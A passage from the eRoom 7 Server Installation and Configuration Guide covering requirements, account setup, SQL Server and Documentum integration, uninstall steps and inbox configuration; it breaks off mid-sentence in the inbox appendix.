eRoom 7 Server Installation and Configuration Guide

eRoom 7 Server
Installation and Configuration Guide
Documentum, Inc., a division of EMC
6801 Koll Center Parkway, Pleasanton, CA 94566
(925) 600-6800
COPYRIGHT
Copyright © 1997-2004
Documentum, Inc., a division of EMC
6801 Koll Center Parkway, Pleasanton, CA 94566
(925) 600-6800
Trademarks
Documentum® Documentum RightSite®, Documentum Server®, Docbasic®, Documentum DocPage
Server®, Now You Know®, Documentum WorkSpace®, Documentum SmartSpace®, Documentum
ViewSpace®, AutoRender Pro™, Docbase™, DocInput™, Docobject™, DocPage Builder™, Documentum
4i™, Documentum Administrator™, Documentum CADLink™, Documentum Commerce Server
Integrators™, Documentum Application Server Integrators™, Documentum Content Authentication
Services™, Documentum Content Personalization Services™, Documentum ContentCaster™,
Documentum Corrective Action Manager™, Documentum Desktop Client™, Documentum Developer
Studio™, Documentum DocControl Manager™, Documentum DocLoader™, Documentum DocViewer™,
Documentum Dynamic Content Assembler™, Documentum eConnector for CAD™, Documentum
eConnector™ for IBM WebSphere® (IBM and WebSphere are trademarks of IBM) Documentum
eConnector for SAP™ (SAP is a trademark of SAP AG), Documentum eConnector™, Documentum
eConnector™ for BEA Weblogic® (BEA is a registered trademark of BEA Systems Inc) Documentum
eConnector™ for JDBC, Documentum eConnector™ for ATG Dynamo® (ATG and Dynamo are registered
trademarks of Art Technology Group), Documentum eConnector™ for Lotus Notes® (Lotus Notes is a
registered trademark of Lotus Development Corporation) Documentum eContent Server™, Documentum
Engagement Services™, Document Engagement Server™, Documentum ftpIntegrator™, Documentum
Intranet Client™, Documentum iTeam™, Documentum Reporting Gateway™, Documentum Site Delivery
Services™, Documentum Web Development Kit™, Documentum Web Gear™, Documentum WebCache™,
Documentum Web Publisher™, GMPharma™, GXPharma™, GDPharma™, GSPharma™, Momentum™, Virtual
Document Manager™ (VDM), Documentum Selfrepair™, and eRoom are trademarks or registered
trademarks of Documentum, Inc. in the United States and throughout the world. All other company and
product names are used for identification purposes only and may be trademarks of their respective
owners.
eRoom 7 Server Installation and Configuration Guide | i
Pre-installation Requirements .................................................................................. 1
eRoom Server Versions .................................................................................. 1
System Requirements ................................................................................... 2
Port Requirements ....................................................................................... 3
Additional Requirements for Using eRoom 7 with Windows Cluster Services ................... 3
Additional Requirements for eRoom Enterprise ..................................................... 3
Additional Requirements for eRoom 7 for Microsoft SQL Server ................................. 4
Ensuring Sufficient Disk Space ......................................................................... 6
Setting Up An Install Account .......................................................................... 6
Setting Up a File Server Account ...................................................................... 7
Setting Up a File Server Directory ..................................................................... 7
Installing the Index Server (Advanced Installations Only) ......................................... 8
Shutting Down Applications ............................................................................ 8
Selecting a Web Site ..................................................................................... 8
Installing eRoom 7................................................................................................... 8
To install eRoom 7 for SQL Anywhere ................................................................ 9
To install eRoom 7 for SQL Server ..................................................................... 9
Additional Procedures for eRoom Enterprise .......................................................10
Getting Started Using eRoom 7 ................................................................................13
For More Information................................................................................... 13
eRoom and NT Server Default Permissions .................................................................14
eRoom 7 Rights and NTFS Rights ......................................................................14
Checking eRoom Permissions.......................................................................... 14
Uninstalling eRoom 7 .............................................................................................. 14
Appendix A: Configuring eRoom Inboxes ...................................................................16
Creating an SMTP Mail Account on a Mail Server for eRoom Usage .............................16
Administrative eRoom Inbox Settings ................................................................16
How do end users direct email to particular inboxes? ............................................16
Conversion of Mail Messages to eRoom Inbox Pages ...............................................17
Appendix B: Configuring a Reverse Proxy Server with eRoom 7 ....................................18
Configure the Reverse Proxy Server ..................................................................18
Configure the eRoom Web Server ....................................................................19
Notes ......................................................................................................19
Appendix C: eRoom Security Guidelines .................................................................... 21
eRoom Server Operating System Hardening ........................................................ 21
eRoom Security ..........................................................................................21
Using eRoom within an Internal Network ...........................................................22
Using eRoom in the Extended Enterprise ........................................................... 23
Appendix E: Clustering Environment Setup ................................................................28
Before You Begin ........................................................................................28
Clustering Overview ....................................................................................28
Requirements ............................................................................................30
Operating System, Network, and Disk Installation .................................................31
Cluster Service Setup ...................................................................................32
eRoom Software Installation ..........................................................................33
Applying eRoom Maintenance Releases to the Cluster Environment ............................34
Adding a Failed Web or Database Cluster Node Back to the Cluster ............................34
Additional Resources ...................................................................................35
Appendix F: Troubleshooting Problems with Web Publisher .........................................36
PREFACE
In addition to installation instructions, the eRoom 7 Installation and Configuration Guide
covers the following topics:
• configuring eRoom Enterprise
• installing with clustering services
• Microsoft SQL Server configurations
• setting up your initial facility and adding eRoom members
• complete uninstall instructions
• server components and locations
• information about default permissions
• configuring inboxes
• configuring a reverse proxy server
• security guidelines
Pre-installation Requirements
eRoom Server Versions
Requirements for eRoom 7 vary depending on the type of eRoom 7 installation and the type
of database you use. eRoom 7 is available in two different installations:
Standard installation
The Standard installation is limited in the number of servers that can be used. Typically,
the eRoom 7 server (web server), and file server reside on the same machine, although the
file server directory can be placed on a separate machine from the eRoom 7 server. (If you
have the SQL Server version of the Standard installation, the database server can also
reside on a different machine.)
The Standard installation is available in two different database versions:
• One provides an embedded SQL Anywhere database.
• One lets you use Microsoft’s SQL Server, which includes support for SQL Server 2000.
  “eRoom 7 for SQL Server” refers to this version. The SQL Server version can be installed
  in an environment that uses Microsoft Windows Cluster Services. (Configuring eRoom 7
  to take advantage of this service requires some extra Windows environment procedures.)
Advanced installation
The Advanced installation is a multi-server version, in which the web server, indexing
server, database server, and file server can reside on different machines, and there can be
multiple web and database servers. The Advanced installation can only be used with SQL
Server. It can be installed in an environment that uses Microsoft Windows Cluster Services.
(Configuring eRoom 7 to take advantage of this service requires some extra Windows
environment procedures.)
System Requirements

Hardware

  Client:
  For browser-only access (“thin client”), system requirements are that of the
  browser itself.
  For browser access with the plug-in (“rich client”):
  • 300 MHz Pentium
  • 128 MB RAM
  • 50 MB free disk space

  Server(s):
  • 900 MHz single processor
  • 512 MB RAM
  • 512 MB free disk space (for eRoom server). File server disk space requirement
    depends on usage. Index server requirement is approximately 50% of total file
    usage.
  Note: in the Standard installation, your database and index server are on the
  same machine as your eRoom server, requiring more disk space.

Software

  Client:
  The following can be used with either the thin-client or the optional plugin:
  • Microsoft Windows 2000
  • Microsoft Windows 2003
  • Microsoft Windows XP®
  • Microsoft Windows NT® 4.0 (with Service Pack 6a)
  • Microsoft Windows 98
  • Microsoft Windows ME
  The following can be used with the thin-client only:
  • Microsoft® Windows® 95 (with Service Pack 1)
  • Macintosh OS 8.5 or 9.x
  • Macintosh OS X
  • Sun Solaris 2.7 or higher
  • HP-UX 10.20 or higher
  • Linux RedHat 7.x
  Supported browsers:
  • Microsoft Internet Explorer® 5.0.1 or higher
  • Netscape Navigator® 4.7 and higher. (Note: Navigator® 4.7 and 6.0 provide
    browser-only access.)
  • Netscape 7.0 or higher or Mozilla 1.0 or higher can be used with the rich
    client, but Internet Explorer 5.0.1 must be installed on the machine.

  Server(s):
  • Windows 2000 Server (with Service Pack 2 or later)
  • Windows 2000 Advanced Server (with Service Pack 2 or later)
  • Windows Server 2003 Standard
  • Windows Server 2003 Enterprise
  The following can be used for nonproduction (evaluation) use only:
  • Windows 2000 Professional
  • Windows XP Professional
  Supported database platforms:
  • Embedded SQL Anywhere database
  • Microsoft SQL 2000 (Service Pack 1; Service Pack 2 recommended)
Note: The above requirements are minimums for production environments. In some
cases, requirements are lower for evaluation or other non-production purposes.
Port Requirements
If you are using eRoom 7 with a separate file server that resides behind a firewall, or if you
are using eRoom 7 for SQL Server and the SQL server resides behind a firewall, there are a
few unique firewall port requirements you should be aware of:
• For eRoom 7 for SQL Server, the use of Microsoft Distributed Transaction Coordinator
  (DTC) is required. DTC ensures transactional integrity when eRoom 7 writes to both the
  site database and to an eRoom database. DTC requires the following open ports:
  - 135 RPC EPM (End Point Mapper)
  - 1433 TDS SQL (for TCP/IP traffic)
  - 1434 SQL 2000 (for Integrated Security)
  - 5100-5200 MSDTC (dynamically assigned)
• If your site uses a separate file server that resides behind the firewall, then the
  following open ports are required:
  - 137 NetBIOS Name Service (for browsing requests of NetBIOS over TCP/IP)
  - 138 NetBIOS Datagram Service (for browsing datagram responses of NetBIOS over
    TCP/IP)
  - 139 NetBIOS Session Service (for file sharing and print sharing)
  - 445 Common Internet File System (CIFS)
Additional Requirements for Using eRoom 7 with Windows Cluster Services
If you are going to use eRoom 7 in conjunction with Microsoft Windows Cluster Services, the
following requirements also apply:
• Windows 2000 Advanced Server only
• Active/passive cluster pairs only (not active/active)
• Microsoft SQL Server (not Sybase), separate or same server
• Hardware configurations in which Clustering Services are supported for Windows (see
  http://www.microsoft.com/hcl/)
• For information on setting up a clustering environment in preparation for installing
  eRoom 7, see Appendix E: Clustering Environment Setup, on page 28.
Additional Requirements for eRoom Enterprise
If you are going to use eRoom Enterprise (an integrated environment consisting of eRoom 7
and Documentum’s Content Server ECM system), the following requirements also apply:
• You must use version 7.0.2 of eRoom.
• If you use eRoom for SQL Server, and you already have a SQL server set up for use by
  Documentum, you must create a new instance of the SQL server for use by eRoom. This
  is necessary because Documentum requires a case-sensitive sort order, while eRoom
  requires a case-insensitive sort order.
• Documentum Foundation Classes (DFC) version 5.1 or greater must be installed on each
  machine where the eRoom 7 server software is installed. A DFC installer is available for
  download with eRoom 7.
• In order to use eRoom 7 with Documentum Web Publisher, you must install a copy of Web
  Publisher version 5.2 or later on the eRoom server. eRoom 7 only needs to access Web
  Publisher files; Web Publisher does not need to run on the eRoom server.
• If you want to make Documentum templates available for users who publish eRoom 7
  files to Documentum, you will need to create dedicated template folders within the
  Documentum Docbases eRoom 7 will use.
• You must create a dedicated Documentum account with superuser privileges for each
  Docbase that will be used by eRoom 7.
• The Documentum Connector must be enabled on the eRoom 7 Site Settings page, as well
  as the Community Settings page for any community that will use eRoom Enterprise.
• You must increase the DFC resources used for connecting the eRoom 7 server and the
  Documentum server by editing the dmcl.ini file within DFC.
• If you are going to use Documentum’s Webtop interface, and you are running Webtop
  5.1, you must also install the Webtop patch provided on the Documentum site along with
  the eRoom 7 and DFC downloads. (Webtop requires an Internet Explorer 5.5 or later
  browser.)
• If you need Thumbnail or Rendition support, Documentum Media Services version 5.1 or
  greater must be installed and configured to work with Content Server.
• If you want to display within eRoom the properties of eRoom items that are linked to
  Documentum’s Content Server, you must install the eRoom WDK Component. This is not
  strictly required for using eRoom Enterprise, but it is necessary if you want to access the
  properties of linked items from within eRoom.
For additional information on these requirements and on configuring eRoom 7 to work with
Content Server, refer to the section Additional Procedures for eRoom Enterprise, on page
10 in this guide.
Additional Requirements for eRoom 7 for Microsoft SQL Server
System requirements
If you are going to use the eRoom 7 for Microsoft SQL Server database version, the following
requirements also apply:
• Although eRoom can log into an existing account, we recommend creating a new SQL
  Server account specifically for eRoom to use. The account must use SQL Server
  authentication, not Windows NT authentication, and must at least have dbcreator rights
  to install.
• For performance reasons, we recommend installing Microsoft SQL Server and eRoom 7
  for SQL Server on different machines on the same NT network and same domain, or any
  fully-trusted domain.
• If you decide to install SQL Server on a separate server, you must install some additional
  items on the eRoom 7 server machine. In particular, you must install the Client
  Connectivity option found on the Microsoft SQL Server installation CD. For Microsoft SQL
  2000, you must also install the Management Tools option. Reboot the web server after
  installing the SQL Client software.
• SQL Server defaults to port 1433, but this port can be changed, if appropriate.
• If your SQL server resides behind the firewall, you must use Microsoft Distributed
  Transaction Coordinator (DTC) to ensure transactional integrity. (See the Port
  Requirements section for additional details.)
• For optimal eRoom performance, set the SQL Server to communicate with client
  applications using TCP/IP. To confirm this setting, choose from the Start menu Programs >
  Microsoft SQL Server 7.0 > Client Network Utility, and then set the Default Network
  Library to “TCP/IP”. To do this, make sure only the TCP/IP protocol is enabled in the
  General tab of the SQL Server Client Network Utility.
• You should stop the Microsoft SQL Server services and apply any required service packs.
  You can download the service packs from the location http://www.microsoft.com/
  download.
  From the registry, you can find out which version of Microsoft SQL Server you are
  running. Check the product version of sqlservr.exe, which should be 7.00.842:
  HKLM\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\CurrentVersion\CSDVersion
• Microsoft SQL Server must be installed with the following Microsoft defaults:
  - Character Set: 437 U.S. English
  - Sort Order: 1252 ISO character set, 52 nocase_iso Dictionary order,
    case-insensitive. (Other sort orders like binary are not supported. To verify SQL
    Server sort order, from the MS SQL Query Analyzer run the SQL statement
    sp_helpsort.)
  - Unicode Collation: 1033 General Unicode
  - Unicode Style: Case-Insensitive
• On the same web server where the eRoom Server software will be installed, install (from
  the Microsoft SQL Server installation CD) the SQL Server Client Network Utility and, for
  Microsoft SQL Server 2000, management tools.
Information you should collect
The eRoom 7 installation asks for three things related to your Microsoft SQL Server:
• Server Name - Choose or type the name of the machine on which Microsoft SQL Server is
  running.
• User Name - Enter the login ID for the account you want eRoom to use.
• Password - Enter the password for the above login ID.
Ensuring Sufficient Disk Space
It is important to ensure that your eRoom installation (including the file server, index
server, and server data) has room to grow. The files and directories that will grow in size
depend on whether you have the Standard installation of eRoom 7 or the Advanced
installation.
Version: Standard Installation, SQL Anywhere
Disk partition recommendations: Use separate partitions for the following and make sure
they have sufficient room to grow:
  • the File Server directory you specify
  • the eRoom Data directory (on SQL Anywhere, this includes the site and facility
    databases, the full-text search databases, and the optional log files)

Version: Standard Installation, SQL Server
Disk partition recommendations: Use separate partitions for the following and make sure
they have sufficient room to grow:
  • the File Server directory you specify
  • the site and facility databases
  • the eRoom Data directory (on SQL Server, this includes the full-text search
    databases and the optional log files)

Version: Advanced Installation, SQL Server
Disk partition recommendations: Use separate partitions for the following and make sure
they have sufficient room to grow:
  • the File Server directory you specify
  • the eRoom Data directory (in this version, this includes only the optional log
    files, which are not very large, and--if you are using eRoom Enterprise--a
    Documentum Foundation Classes working directory.)
Setting Up An Install Account
All installations
For both Standard and Advanced installations of eRoom 7, the Windows account used to
install the eRoom software must have administrative rights for the server and must also
have “Act as part of the operating system” rights. If this right is not set, the eRoom install
will set it and prompt you to log out then log in again.
Advanced installations only
Because an eRoom 7 Advanced installation spans multiple servers connected to a single
site, we recommend that you set up a dedicated Windows account for installing and
administering eRoom 7.
This account should be a domain-level account that is added to the local administrator’s
group on the server(s). By making this a domain-level account, you ensure that the login is
common across multiple servers and the user credentials will be identical. In the case of
servers located within a DMZ (not on a domain), create a local account and use a standard
naming convention for install accounts across all servers.
Setting Up a File Server Account
Standard installations only
If you intend to store files uploaded to eRoom 7 in a directory on the eRoom 7 server itself,
then you do not need to set up a File Server account for the Standard Installation. However,
if you intend to store your File Server share on a different machine than eRoom 7, you must
set up an account (either domain or local) for access to the File Server. The account does
not need any special Windows rights (administrative rights, for example).
Advanced installations only
For all Advanced installations, you must create a Windows account for eRoom 7 to use to
access the File Server share (the location where eRoom 7 files are uploaded and stored).
The account should be a domain account, unless you are installing eRoom 7 within a DMZ.
The account does not need any special Windows rights (administrative rights, for example).
Setting Up a File Server Directory
All installations
All eRoom 7 installations require a File Server directory to contain uploaded files. Because
the Site Creation wizard will prompt you for this directory after you install eRoom 7, you
should create this directory before launching the install.
In addition, you must also share the File Server directory via Windows file sharing (unless
you are both placing the File Server directory on the same machine as eRoom 7 and
performing a Standard installation). The only account that needs share access to the File
Server directory is the File Server account discussed in the previous section.
Note: If you create the File Server directory on a shared drive on a cluster configuration,
then you must also create a clustered file share resource for this shared drive in the Cluster
Group. This resource will need the permissions set up for the File Server account to access
the data files. Otherwise, the shared drive will not be available after a failover.
Installing the Index Server (Advanced Installations Only)
If you intend to perform an Advanced installation, you should prepare for this installation
by downloading and running the index server setup program on the machine you would like
to use as an index server. (This setup file is listed as the eRoom 7 Search Engine Installation
and is located with the eRoom 7 files on the Documentum download site.) When you create
an eRoom 7 site, you will be asked for the name of the index server. You can then enter the
name of the machine on which you installed the index server.
If you install the index server after creating the eRoom 7 site, or if you do not enter the
name of the index server when you create the eRoom 7 site, then you will need to add the
index server (once installed) to the eRoom site by means of the eRoom 7 Admin utility.
Shutting Down Applications
To install the eRoom Server, close all applications temporarily. Disable virus scanners during
the installation. Restart applications after installation and re-enable virus scanners.
Selecting a Web Site
When you install eRoom Server, you are prompted for a web site on which to install eRoom.
You can use the default web site, or you can use an additional web site that you created
within IIS. Refer to IIS online documentation for information about how to set up IIS with
multiple web sites. eRoom recommends testing an additional web site configuration before
installing the eRoom software.
Installing eRoom 7
This section explains how to install eRoom 7. If you are upgrading from a previous version
of eRoom 7, refer to the eRoom 7 Server Upgrade and Configuration Guide. Once the
eRoom 7 files are installed, and your server has re-booted, the install program will lead you
through the steps to set up or join an eRoom site.
An eRoom 7 site consists of one or more servers that support a population of eRooms and
users. All servers in a site share a common membership. Consequently, members can log
into the site and then not have to log in again during the same session--even if they go to
different eRooms and servers. A site can be as small as a single server, but (with the
Advanced installation) can have many servers. A site can be subdivided into multiple
communities.
Installing eRoom 7 onto a server with no previous eRoom installation involves the following
procedures:
• Running the Setup program to install the software
• Running the Site Setup program to set up or join an eRoom 7 site
• Specifying Site Settings
To install eRoom 7 for SQL Anywhere
1. Log in to your web server under the administrator account you established in the section
Setting Up an Install Account.
2. Download and run the eRoom 7 installer. Only the Standard installation of eRoom 7 is
available for SQL Anywhere.
3. Follow the instructions in the Setup program until the installation completes.
To install eRoom 7 for SQL Server
eRoom recommends installing Microsoft SQL Server and eRoom 7 for SQL Server on different
machines on the same NT network and same domain, or on any fully-trusted domain.
1. Install Microsoft SQL Server before you install eRoom 7 for SQL Server. (Note that binary
sort order is not supported.)
   For cluster services only. (Additional detail available in Appendix E: Clustering
   Environment Setup, on page 28.)
   - Install Microsoft SQL Server Client (including the management objects) on both
     cluster nodes.
   - Change the IIS anonymous user on both nodes to a common domain user (such as
     EROOM\CLUSTER_USR). To do this, right-click My Computer and choose Manage /
     Services and Applications / Internet Information Services / Default Web Site /
     Properties / Directory Security tab / Anonymous access and authentication control,
     click “Edit” / Authentication Methods dialog: Anon is selected, click “Edit” / enter
     username (for example, CLUSTER_USR).
   - Change the recovery settings for the IIS Admin and W3SVC services. To do this,
     right-click My Computer and choose Manage / Services and Applications / Services /
     IIS Admin (and W3svc) / Properties / Recovery tab / Choose “Take no action” from
     the “First failure” drop-down list.
2. On the same server where the eRoom Server software will be installed, install (from the
   Microsoft SQL Server installation CD) the SQL Server Client Network Utility and, for
   Microsoft SQL Server 2000, management tools.
   - Although eRoom can log into an existing account if you prefer, we recommend
     creating a new SQL Server account specifically for eRoom to use.
   - The account must use SQL Server authentication, not Windows NT authentication,
     and must have dbcreator rights.
   - Apply any Microsoft SQL Server Service Packs (stop the Microsoft SQL Server services
     first). Reapply any NT service pack after applying the SQL Server Service Packs. You
     can download Service Packs from:
     http://www.microsoft.com/download
   - Before installing eRoom 7 for SQL Server, test your connection to the Microsoft SQL
     Server using the SQL Server Client Network Utility.
3. Log in to your web server under the administrator account you established in the section
Setting Up an Install Account.
   For cluster services only. To install, move the cluster group to this node (if this is not
   already the active node).
4. Download and run the preferred eRoom 7 for SQL Server installer. Both the Standard
   installation and Advanced installation of eRoom 7 are available for SQL Server.
   For cluster services only. (Additional detail available in Appendix E: Clustering
   Environment Setup, on page 28.)
   Install eRoom on the first node, placing all eRoom program files, eRoom web site files,
   and data on the shared drive. The following locations are recommendations:
   - eRoom Web directory: <Shared Drive>:\inetpub\eRoom
   - eRoom Server Administration directory: <Shared Drive>:\eRoom\eRoom server
   - eRoom Server Data directory: <Shared Drive>:\eRoom Data
   Install eRoom on the second node:
   - Move the cluster group from the first node to the second node.
   - Install eRoom. You will not be prompted for the location of eRoom files, since that
     information was entered during the first install.
   - The eRoom install will create a facility with an initial set of eRooms.
5. Follow the instructions in the Setup program until the installation completes.
If you are planning to use eRoom Enterprise, you must also complete the procedures in the
following section. Otherwise, see the section Getting Started Using eRoom 7, on page 13.
Additional Procedures for eRoom Enterprise
If you are planning to use eRoom Enterprise, which combines eRoom 7 with Documentum’s
Content Server, you must also complete the procedures in this section.
Installing DFC on the eRoom 7 server
Documentum Foundation Classes (DFC) must be installed on the same server(s) as eRoom 7.
A DFC installer is available for download with eRoom 7.
1. Log in to your web server as administrator.
2. Download and launch the DFC installer.
3. Follow the instructions in the Setup program until the installation completes.
4. After the Setup program is finished, you must re-boot.
5. Edit the dmcl.ini file for DFC to increase the resources used for connecting the eRoom 7
server and the Documentum server.
The dmcl.ini file resides in the \WINNT directory of the machine on which you are
installing DFC. Edit it by adding the following lines:
[DMAPI_CONFIGURATION]
cache_queries = T
client_codepage=UTF-8
client_cache_size=1000
connect_pooling_enabled=T
max_session_count=100
max_collection_count=100
(You can also find a copy of these lines in the ...eRoomServer\dmcl_settings.txt file of
your installed copy of eRoom 7.) These settings are the recommended minimums.
6. If you are installing the DFC after installing eRoom 7, you must run the eRoom Checker
to configure the correct permissions on Documentum-related files and folders. Locate
the ERChecker executable in the ...\Program Files\eRoom\eRoom Server directory and
specify a check for General Site Consistency and All File Permissions.
Creating a dedicated eRoom 7 template folder
If you want eRoom 7 users to be able to choose Documentum template files when
publishing a file to Documentum, you must create a folder for the template files within
each Docbase that will be used by eRoom 7. The folder(s) must meet the following criteria:
• They must be named eRoom Templates and placed within the /System cabinet of the
Docbase.
• They must have world write access. Note that world write access lets any Docbase user
add or replace the templates that eRoom users will publish from, so review the folder's
contents from time to time.
Creating dedicated content server accounts
You must create a dedicated Content Server account with superuser privileges for use by
eRoom 7. The account must be created in each Docbase that eRoom 7 will access, and the
account login name and password must be the same in every Docbase, because eRoom stores
only one login and password for Documentum access. Since this is a superuser credential,
limit who can reach the eRoom 7 Site Settings page where it is entered.
Be sure to make a note of the login name and password for the account(s) you create, so
that you can enter them on the eRoom 7 Server Settings page.
The two most convenient ways to add a single user to a Docbase are to use either the
Documentum Administrator utility or the Webtop utility (if available at your site). For
information on adding a user account with Documentum Administrator, refer to the
Documentum Content Server Administrator’s Guide. For information on adding a user
account with Webtop, refer to the Documentum Using Webtop manual.
Enabling use of content server by eRoom 7
Once both eRoom 7 and DFC are installed on the server and you have created the dedicated
Content Server account, you must enable use of eRoom 7 with Content Server on the eRoom
Site Settings page.
You can get to the Site Settings page in one of two ways:
• remotely, by entering the URL servername.com/eRoom in your browser, then going to Site
Settings.
• locally, by using the Microsoft Management Console (MMC): choose Start > Programs >
eRoom Administration > eRoom Server Administration.
1. On the eRoom 7 Site Settings page, click the General tab, then scroll down to the Documentum section.
2. Make sure the Enable Documentum Connector checkbox is selected.
3. Enter the Login name and Password for the dedicated Content Server account you created for your Docbase(s).
4. Specify any other options you prefer for the remaining Documentum settings. (For
example, if you are going to use Documentum’s Webtop interface, enter the Webtop
URL.)
5. Scroll to the top of the Site Settings page and click the Apply button.
6. Scroll down to the Documentum section.
A Test button is now available.
7. Click the Test button to verify that the Login name and Password you have provided
afford access to Documentum.
For details about all Documentum server settings, see the eRoom Administration section of
the eRoom 7 online Help.
Installing Web Publisher on the eRoom server
Web Publisher is an easy-to-use, browser-based interface that enables non-technical users
to easily create, manage, and publish content for multiple, multilingual Web sites. If you
are planning to use eRoom 7 with Documentum Web Publisher, you must also complete the
procedures in this section. In order for the eRoom server to communicate with application
servers running Web Publisher, a copy of Web Publisher must be installed on the eRoom
server. If a supported application server is not already installed on the eRoom server, then
an application server must first be installed before installing Web Publisher.
1. Install a supported application server (for example, BEA WebLogic or Apache Tomcat) on
the eRoom server.
2. Install Web Publisher (Web_Publisher_5.2.x_windows.exe) on the eRoom server.
Note: You do not need to run either the application server or Web Publisher on the
eRoom server; you only need to install them there.
If you receive errors when attempting to work with Web Publisher files, or if you are
unable to see Web Publisher files or folders, please see Appendix F: Troubleshooting
Problems with Web Publisher, on page 36.
Configuring Web Publisher servers for use with eRoom
In order for “Go to Content Server...” command in eRoom to work correctly with Web
Publisher servers, you must perform the following procedure on each Web Publisher server
that eRoom will connect to.
1. Locate the XML file wp\config\app\contextsensitive_view_config.xml.
2. Open the file, and under the <actions_list> tag enclosed within the <component> tag,
add the following line:
<an_action_name="search" valid_by_default="true"/>
3. Log into Web Publisher as a user with administrative privileges.
4. Press the Ctrl key while clicking the Documentum icon in the top-right corner of the
page.
5. Click the Configuration button.
6. Click the “Re-configure View Sensitive Action” link.
7. Wait until the process finishes, then close the popup window.
Getting Started Using eRoom 7
To learn more about beginning to configure and use eRoom sites and rooms, see the
Welcome to eRoom topic in the eRoom 7 online Help. To open this topic, choose Start>
Programs> eRoom Server> Getting Started with eRoom.
For More Information
Refer to the eRoom 7 online Help for product documentation (for administrators as well as
end users). To open the Help, click the Help icon in the control bar at the top of an
eRoom page.
• For information about new features in eRoom 7, see the What’s new in eRoom 7 topic.
• For details about the user interface, see the Guided tour in the Working in your
eRoom topic (Basics section).
• For information about coordinating an eRoom, see the section Coordinating an eRoom.
• For server and facility administration details, see the Administration section.
• For information on managing eRoom membership (including the use of NT domain and
LDAP directories), see the Membership section.
See also: Visit the Documentum Support site for additional Support Note information.
eRoom and NT Server Default Permissions
Note: An eRoom installation sets up default permissions. Organizational standards vary
from enterprise to enterprise, and these permissions can be changed to “harden” the
server. Follow Microsoft's recommendations for hardening IIS on Windows NT or 2000, but
test any configuration changes sufficiently before installing eRoom.
eRoom 7 Rights and NTFS Rights
Access rights set in the eRoom application are not passed down as NTFS rights to the
operating system (NT/2000). Conversely, general NTFS permissions for each NT user on the
server do not apply to eRoom objects or files. The eRoom application user rights will
determine access control to the application (communities and eRooms) and rights to
eRoom-specific objects. The NTFS permissions that matter are those of the IUSR account
(the anonymous access account used by IIS) and of the eRoom Server user account created
by the eRoom installer. Both accounts are used to access server resources, but the IUSR
account's access is limited in scope.
Checking eRoom Permissions
eRoom provides a utility called the eRoom Checker that does a deep permissions check on
the eRoom web server. It checks and lists a detailed permission checklist for the entire
server, including registry and directories for the IUSR and System NT Accounts. In addition,
it checks the integrity of database objects and can make permissions repairs and add
missing facilities and erooms to the site database.
You run eRoom Checker from the eRoom Server Administration MMC console. Please contact
eRoom Technical Support for assistance with running this utility.
See also: For more information about the eRoom Checker utility, see the eRoom Diagnostic
and troubleshooting tools section of the System Administration section of online Help.
For more information on Windows NT permissions and security, see the following web
resources:
http://www.microsoft.com/technet/iis/permmaze.asp
http://www.microsoft.com/technet/security/iis5chk.asp
Uninstalling eRoom 7
Use the following procedure to remove everything associated with an install of eRoom 7.
Note: Do not perform this procedure if you still have eRoom data you want to save or
recover.
1. Shut down the eRoom Monitor (if you installed the eRoom client on the same machine as
the eRoom Server).
2. Use the eRoom Server Administration MMC console to delete the site. (Select the eRoom
folder, right click, and choose All Tasks > Delete Site).
3. Uninstall the eRoom Server by opening the Control Panel and double-clicking "Add/
Remove" Programs. Choose eRoom Server and click "Remove". If prompted to remove
files no longer in use, you can select “Yes” at your discretion.
4. After removing eRoom 7 and rebooting, verify the following:
• Verify that your ...\eRoom Data directory (or whatever else you named it during
install) has been remov­ed. If not, remove it (provided a backup isn't needed or
already exists).
If you are using Microsoft SQL Server 2000, also ensure that the eRoom databases have
been removed in SQL Server Enterprise Manager. If not, delete them.
• Verify that registry entries have been removed.
- Run Registry Editor (Start > Run > Regedit).
- Select HKEY_LOCAL_MACHINE\SOFTWARE\.
- Find the eRoom key under the SOFTWARE key.
- Verify that the eRoom key is removed. If not, delete the
HKLM\Software\eRoom\eRoom Server key. Do not do this if you still want to keep
eRoom data.
• Verify that the eRoom Server files have been removed.
- Go to the following directory and delete it if it still exists (this is the
default; installation locations may vary):
/inetpub/eRoom - remove the eRoom directory
• Verify that all virtual roots have been removed from IIS:
- Open the Internet Service Manager and check for any "eRoom" roots.
- If any still exist, right-click and delete all the "eRoom" virtual directories/
applications.
• Make sure that IIS services are started and that you can access the IIS default home
page. Then you can re-install eRoom if needed.
Appendix A: Configuring eRoom Inboxes
An eRoom inbox is a special folder that can receive and store email messages (and their
attachments). By cc'ing email messages about your project to your eRoom, you can create
an automatic archive of project correspondence. To retrieve messages, the eRoom Scheduler
reads them from the drop directory of the SMTP service configured for eRoom (see below),
rather than logging in to a mailbox the way a mail client such as Outlook Express or
Eudora does.
Creating an SMTP Mail Account on a Mail Server for eRoom Usage
Establishing an SMTP service and domain
1. In the IIS Admin Console on the eRoom server that will host the SMTP service, make sure
the SMTP service is installed.
2. Make sure there is a virtual SMTP domain configured within the IIS Admin Console.
3. In the Incoming section of the Email page of the eRoom Site Settings, enter the name of
the SMTP domain from the previous step into the “Email address domain” field.
Creating the inbox
1. In an eRoom, click create and choose the Inbox item. Provide a name and description
for the inbox.
2. Complete the inbox address by filling in the Address field in front of the domain name.
3. Click OK to create the inbox.
Each inbox you create follows the same process. Multiple inboxes can reside in a single
eRoom. All inboxes must have unique email addresses. eRoom will enforce this by
changing email addresses for inboxes that are copied.
Administrative eRoom Inbox Settings
The eRoom Scheduler Service accesses the SMTP accounts to retrieve mail for all eRoom
inboxes. You can disable the inbox functionality within the eRoom Site Settings page by
clearing the “Check for email sent to inboxes” checkbox under the Scheduler section.
When inboxes are enabled, you can use the eRoom Server Tuning dialog box to set the
interval at which the eRoom Scheduler checks for new mail delivered to the SMTP service.
The default setting checks every five minutes.
How do end users direct email to particular inboxes?
eRoom delivers mail to the inboxes based on their addresses. The Scheduler checks for mail
in the drop directory specified in the SMTP service (IIS Manager). For single-server sites,
mail is delivered to the appropriate inboxes. For multi-server sites, mail on servers other
than the one with the SMTP service is temporarily stored in the ~Mail Drop folder on the
main file server. When the Scheduler runs on other servers, it looks for mail in this folder
and directs it to the appropriate inboxes.
Conversion of Mail Messages to eRoom Inbox Pages
eRoom converts each email message sent to an inbox to an eRoom page as follows:
• The subject line becomes the title of the page.
• The page itself contains an email icon for replying to the sender and the text of the
message.
• File attachments are created as attachments to the new eRoom item. If eRoom cannot
determine the type of attachment (because it uses a non-standard MIME type), eRoom
creates a file attachment as a text file called “Attachment N.txt”, where N is a
number greater than zero. Users can rename this file if they like.
HTML email messages:
The inbox feature supports HTML email messages. eRoom restricts the HTML content of
